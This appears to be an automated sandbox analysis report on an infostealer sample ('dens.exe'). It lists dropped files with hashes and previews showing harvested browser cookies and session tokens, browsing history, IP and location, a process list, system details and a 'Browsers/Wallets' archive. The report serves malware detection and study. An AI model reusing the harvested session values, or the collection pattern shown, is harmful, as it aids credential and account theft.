                                                                                                                                                                                                                                          CIEfSpAIUS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                                                                                            Entropy (8bit):1.307374740410517
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrb:KooCEYhgYEL0In
                                                                                                                                                                                                                                            MD5:98D03E0F8D99A86AB0ACFCB640E68905
                                                                                                                                                                                                                                            SHA1:36C04F800E18FD5153BAB3C8D09EE33F01F29DD7
                                                                                                                                                                                                                                            SHA-256:0BCDED950CA46CA6C736CCF7680C1228BBFBFBEF384E17F67A0116EE03696430
                                                                                                                                                                                                                                            SHA-512:22A92781C6E8B0F3FA0F34801C11AD4EC9F08992AC85DEDF295E379FD790FA388AEE20937E77AF51525F399A3C3343ECC722170111F6D186CA2651151D55FEC3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6c788e65, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                                                                                            Entropy (8bit):0.4221719746708719
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:hSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:haza/vMUM2Uvz7DO
                                                                                                                                                                                                                                            MD5:CFBBBCCE8085777D854698AA8146C7DF
                                                                                                                                                                                                                                            SHA1:1B4DF86344EDF8E3AEAA7817F6950206131B89BC
                                                                                                                                                                                                                                            SHA-256:DD0A0DDB81643AA5819AF5116A243D4345E34852ED3A23335DBCD2C5CA9C8B8F
                                                                                                                                                                                                                                            SHA-512:C0E625D8B93A9BC9745A445C5DABE4499E27B1169423689D11EC0A1D3DCC6BC400AEF3CA41349266142217174310FB330B2F42964F2552AFE9279203DE990C9F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:lx.e... .......A.......X\...;...{......................0.!..........{A.(&...|U.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................\..(&...|U.................V.^.(&...|U..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                                                                                            Entropy (8bit):0.07723066764839415
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:9dYe6muc5Cjn13a/7mWytollcVO/lnlZMxZNQl:9dzock53qasOewk
                                                                                                                                                                                                                                            MD5:E17C6F5FFDE3899B30A8C81C0FF23E56
                                                                                                                                                                                                                                            SHA1:91309328CC6346CF3908F19079CD942BA2D2010A
                                                                                                                                                                                                                                            SHA-256:29BA53587B19806A77D35F39819ABA3E5D00766F79CD28951D0E16B77B5DA68B
                                                                                                                                                                                                                                            SHA-512:3597A2F5BE096EF569AF93CC6E96CC21CF083D1E0ADAE2FAC698726C1AFED3C8C43AB401646A097E80F9B155FB89B32F05572016EEF0B984A7EE49D5F24C2078
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:eM.......................................;...{..(&...|U......{A..............{A......{A..........{A]................V.^.(&...|U.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:@...e...........................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):700483
                                                                                                                                                                                                                                            Entropy (8bit):7.99796892056391
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:12288:otZnuQ8TeeQU9Ejr8sTa/uGx6HJ3aLE7Wbc5SZ0xEDSb9n2opzUHfGQgsPHuZfa+:otNSTDQyQ8s9FH9aLEabcEZmEDS9n2ov
                                                                                                                                                                                                                                            MD5:46C07A388E1138A3B56A7D82194850AA
                                                                                                                                                                                                                                            SHA1:76A757B833BE2C2DA04F695B392E15F754048FEF
                                                                                                                                                                                                                                            SHA-256:DCE999E9A06A12CB6601C740C0CE2D4F536D62D4F6F3363F1B595CBE8E395D67
                                                                                                                                                                                                                                            SHA-512:81A50DA805827FD57BAD6286E2909AFD5FE520235325CF8ED27E5F4CFC5B2980383C60C9B5977AE39EB22559E328F4B4AAB7C8E984BCF9BF39C62A2A23B22630
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:PK.........lY................Browsers/PK.........lY................Wallets/PK.........lY.^.dc.........Display (1).pngl.{<...?~m&...@%.&EZ...C...&dr....8F...X...sN..r..cB.sf.l3..z.?...w.}..m.u]..z^..q?<..+...p..aa....a.,..........%..yo ..C=......W...P./...P....>.........3......Z../n.$.4..=.{y=....>.RW...6wg...}7.<..#F.X........B.3V.C.........F....U.*."~......Q.........|..Q.5X&..Z]D7d...w...s=X"s!..+.b....Wq.I......5..}o...z5.B..OT.:^w../.e..<.....T......+.G..&.Om.L.$.9%.%$....65c..}..snk.f.Cu...........-u.1.{7.....9.I....d..O............{a1..~.|"<..w......:...jB./QF..^S.mQ{..C...,j.....7d.....*..3...K..y...x./.\.1y..<..<8a..L.Vc.9.{..S.N......S..H.3R..u.?.S..N..l....$*..9#....(.^3.qk.Q.D.^.d...Rc....../..OT<,..Ho...~n.i.s..C.j.u..Ec..O.Z....=.e?.u..V.......nf.M-r....e{G.OxChS.....?.Tt..6...Y..f...C....R.e....>w....ot....L.../j...-...lL'.%......lc..,.]..d...w;9.<*V.....<h......2.......q{.T.r#..m..B..~...#../.P..[.*.7`....]..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (522), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3485
                                                                                                                                                                                                                                            Entropy (8bit):5.880558909658437
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:L3JMpoO2gFcRqFZL2L+yLstv3pPDYReynqsbCw4R2cksr:tFFRiNEUd7
                                                                                                                                                                                                                                            MD5:1D7CE3DBF44109F28568453671E258B7
                                                                                                                                                                                                                                            SHA1:C5A3D4AD80D6D7221ABB0ECD32978442B853D067
                                                                                                                                                                                                                                            SHA-256:18A6A15B4C803D660F5EBE7AF81D7F2C56DB6477D29617AF0DA2E26F940622B8
                                                                                                                                                                                                                                            SHA-512:C25B46CF6E1B97F0271E69D195C8496C4A4119AA2849CECD8B5194675A6D1559102147E93DB49C94270D8461A3532E6C08953C4A36C775F831CDCB4A1184109D
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:----------------------https://t.me/waltuhium----------------------..======================================================================...google.com.TRUE./.FALSE.13356618603686193.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk..support.microsoft.com.TRUE./.TRUE.13340887435186329..AspNetCore.AuthProvider.True..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359381..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359334..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N..support.office.com.TRUE./.TRUE.133725
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1734
                                                                                                                                                                                                                                            Entropy (8bit):4.129413584613241
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:L+xsMvXvxsajXJl1QXbsBQXY6CQExXBYGQFEDK4:LGlVVgmHgWdIoV
                                                                                                                                                                                                                                            MD5:3DE5FD5C445A9C1154AA34A5413FE75E
                                                                                                                                                                                                                                            SHA1:3E38D3C8483DA8D77CA85435D5574BD21F8446C9
                                                                                                                                                                                                                                            SHA-256:83920E786DFC95B7314C919883286AC1F57EB3FD16F91606C12956F1E6BF6107
                                                                                                                                                                                                                                            SHA-512:F7230C9C318D46DE224CD2BEDAFFEFFC89C16833E7414BE27598A1BEC0C8626C2586B28932AB849C277A3FF5743A11FD1F3AAC2F17B55AB91E4F887713A39B5D
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:----------------------https://t.me/waltuhium----------------------..======================================================================..ID: 1..RL: https://support.mozilla.org/products/firefox..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 2..RL: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-browser&utm_medium=default-bookmarks&utm_campaign=customize..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 3..RL: https://www.mozilla.org/contribute/..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 4..RL: https://www.mozilla.org/about/..Title: None..Visit Count: 0..Last Visit Time: None..============================================================================
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2725
                                                                                                                                                                                                                                            Entropy (8bit):4.658114526716016
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:LozmxDwemx5VcDKJMmx2VuDKJMmxhzxANLpzxAjVVpbjxA0ScpbjxAb:Lozmlwem/aDKMmAEDKMmfz0cdj7njU
                                                                                                                                                                                                                                            MD5:3F9D565B3E2542913E39FA9CB2994AC5
                                                                                                                                                                                                                                            SHA1:772CE9973E114A5FD24F6AFADA1C262016066F51
                                                                                                                                                                                                                                            SHA-256:8C2E3EC9B5B0AD9D8FC2BC89CC031F5156A5860F16AE05603A5FEA8F221543AE
                                                                                                                                                                                                                                            SHA-512:749FABE83DE42DFF1CC934084774E27FF35A874FE627D82052858F1ED7CBCABB396E3B3D0FE607E6F7D622E3D24871543BBCFFBD4EEC1F5F026D01460347244D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:----------------------https://t.me/waltuhium----------------------..======================================================================..ID : 1..URL : https://go.microsoft.com/fwlink/?linkid=851546..itle : Examples of Office product keys - Microsoft Support..Visit Count : 2..Last Visit Time 13340808471256388..====================================================================================..ID : 2..URL : https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016..itle : Examples of Office product keys - Microsoft Support..Visit Count : 2..Last Visit Time 13340808471256388..====================================================================================..ID : 3..URL : https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us..itle : Examples of Office product keys - Microsoft Support..Visit Count : 2..Last Visit Time 13340808471256388..==========================================
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):697826
                                                                                                                                                                                                                                            Entropy (8bit):7.929890901452363
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:mK8bnnYbyazGUjMWU3CV6jEefayPkOKjVT/v2RXefyZF410yzDGwsrzc06b2:m3nnYblaUrL0lcHZr2BeQF419XG7zcj2
                                                                                                                                                                                                                                            MD5:D85998E581146B096F9D38B2D2A9F3AB
                                                                                                                                                                                                                                            SHA1:1B430890888B2B494DF5B41642B445E706B1942E
                                                                                                                                                                                                                                            SHA-256:78114A3606A9B0C5593320068D6BAD16E158DF6CF6FBC3810F323246B381ED5F
                                                                                                                                                                                                                                            SHA-512:464124D1A5CBC6E6E268A61C821E3C7345F76421B9623E3C80C2644ADC594DDADFB872B775540F88E596CE16D1A312A6519D847D8A66F9463BD116A2AE45A8B0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e....Y....3.g=..g.Zm...u....KR.IxWT....%@.".Y.....#..BBjdh..VA.A-S...V. .....9...F.{3o...n.....#.7.A~.qN.u./...|....j.h.m.S_...).C.d.........:.~.p.(...*h.}M%..g....?.Z_}:C_..@..K....:...b.+1./?.f8..5Jk...b.h.TO.G.=.:r.xbL...h..x.....u.c.b.....C..}.#.b........R._|./..._x`.>......HC...........[?....}p....0.h/.=..Y1.`.;....q[j.~kj.a.~K...;s|..Z3d..U......=l......7g4....&6g.;..l.]W..]n..........n.Y..f.b9K-..K.;.JC;..;.Z;..}.v.{...|.KoIs,g..3.Y..,....<.x..io.".>6d.-!.3v.1.....a<...m."....&6g.-i....}...l....67.....vx[.....m{]josm.c...]......;.....k.....m.u.}...^.[............c`...-.......^..^t...=.0..L.Glh..]..5ih.s.."._.X{...y?G.f..}]...kig/.5[...[o..3....J.[.u.OLy.8...E..[...om|Yjove.kmzE.)W..Z..z.c...l......"...2.k..7l.b.......^7....{\`?k..mb...4w+..P..ojkk....g.{1.....<{.c.S..Q.,.a.!...h....y..B.g....^@.......u.....hS.mf..........y..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):250
                                                                                                                                                                                                                                            Entropy (8bit):4.251239015418792
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:111T8BeQ/9GMAR43EN3VOvwHE96ZnXEUWor2x4EcatMWAqpmn:LsPLAXN3Dk96ZnXEn54deMWo
                                                                                                                                                                                                                                            MD5:251139F4BBD7C5BEDA219A90E4773BE6
                                                                                                                                                                                                                                            SHA1:5BBEDA313B658A75E934AD8720F2FBBDE9AD8048
                                                                                                                                                                                                                                            SHA-256:D78C776F14B19C2B8B29A2BC841ED374A2D737FDD8834F84B7FA92A62D453E94
                                                                                                                                                                                                                                            SHA-512:CC1D58212317266DEC8BFA931032372D2B957D84A6DB190AC7F178BEAF065F89F38229F0D4A78D07A7B3761840462C42D1628FD198B10D4E062969A1909DFD0C
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:----------------------https://t.me/waltuhium----------------------..======================================================================..173.254.250.68..United States..Killeen..America/Chicago..QuadraNet OMGITSFAST AS8100 QuadraNet Enterprises LLC
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):24246
                                                                                                                                                                                                                                            Entropy (8bit):4.6451838770544835
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:I68QCP+Isv+ezjctgsYBH5FEogQj9xIxsgDCtleQha61+Q4nQQkLE0M2PQaFYDvr:DQoZqVWDU
                                                                                                                                                                                                                                            MD5:CCBE2E5EF0ED50B800ED53785C841235
                                                                                                                                                                                                                                            SHA1:C7BDA3A1D04DDED43379D2ECE75B052B39519255
                                                                                                                                                                                                                                            SHA-256:D4FA93F7828D7EAF3030A0EEEB5B253CC3751A4AB48E3C62752B73660F3C2D2E
                                                                                                                                                                                                                                            SHA-512:EE49B04627FD276D42A78C91005D1A763BB01D7DD0E67E38A8D09721DB709162ABE4BC4E00704413B1DA36F8E293C0F9F80F99138BB9AEA43667DE9B7D6C2256
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:----------------------https://t.me/waltuhium----------------------..======================================================================.....Image Name: System Idle Process...PID: 0...Session Name: Services...Session#: 0...Mem Usage: 8 K......Image Name: System...PID: 4...Session Name: Services...Session#: 0...Mem Usage: 176 K......Image Name: Registry...PID: 92...Session Name: Services...Session#: 0...Mem Usage: 79'456 K......Image Name: smss.exe...PID: 324...Session Name: Services...Session#: 0...Mem Usage: 1'236 K......Image Name: csrss.exe...PID: 408...Session Name: Services...Session#: 0...Mem Usage: 5'296 K......Image Name: wininit.exe...PID: 484...Session Name: Services...Session#: 0...Mem Usage: 7'256 K......Image Name: csrss.exe...PID: 492...Session Name: Console...Session#: 1...Mem Usage: 6'012 K......Image Name: winlogon.exe...PID: 552...
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Algol 68 source, ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):142996
                                                                                                                                                                                                                                            Entropy (8bit):4.376230488046689
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:0Fz5+DlX7z8oiEmea91gbTvU2LaWJVQgDFIaLVk2vcE66drKwIRBFKdQT8RSayLW:0F1wE8
                                                                                                                                                                                                                                            MD5:B548D96559A283855A3C48991CFC3F73
                                                                                                                                                                                                                                            SHA1:A30C0EBAD0A6B2D125741E5369250EEA230CBB05
                                                                                                                                                                                                                                            SHA-256:8DD747047A9DF15624C0C6D52C3FAB541928F8A9DA74F776F3DF63402425259B
                                                                                                                                                                                                                                            SHA-512:1233EEC018B1B1E1BE71D5AF033EACFCE095B06865C729C2B6B0AB6B8D8A05269F98F30F806E093D6C630FD7D0B2FDFF2F1484AC2BDC778196E972286B1561AB
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:----------------------https://t.me/waltuhium----------------------..======================================================================..####System Info#### ......Host Name: user-PC...OS Name: Microsoft Windows 10 Pro...OS Version: 10.0.19045 N/A Build 19045...OS Manufacturer: Microsoft Corporation...OS Configuration: Standalone Workstation...OS Build Type: Multiprocessor Free...Registered Owner: hardz...Registered Organization: ...Product ID: 00330-71388-77104-AAOEM...Original Install Date: 03/10/2023, 09:57:18...System Boot Time: 24/09/2023, 13:00:03...System Manufacturer: EOU1nWFnl8CywFm...System Model: HFlecuWU...System Type: x64-based PC...Processor(s): 2 Processor(s) Installed.... [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz... [02]: Intel64
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):2.0
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:qn:qn
                                                                                                                                                                                                                                            MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                                                                                                                                                                                                            SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                                                                                                                                                                                                            SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                                                                                                                                                                                                            SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:blat
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):114688
                                                                                                                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):28672
                                                                                                                                                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):126976
                                                                                                                                                                                                                                            Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                            MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                            SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                            SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                            SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):126976
                                                                                                                                                                                                                                            Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                            MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                            SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                            SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                            SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):49152
                                                                                                                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):79089
                                                                                                                                                                                                                                            Entropy (8bit):7.826035301403449
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:YG5/p/kbmg0DxtBGxBcw8e+Bs8Nt06GU8l/z175k/QtlbYlQV9MGFcEtjtQ1YMt8:n5/Jkbmg0DxqxOw8e+Bs8NwUA/z175kA
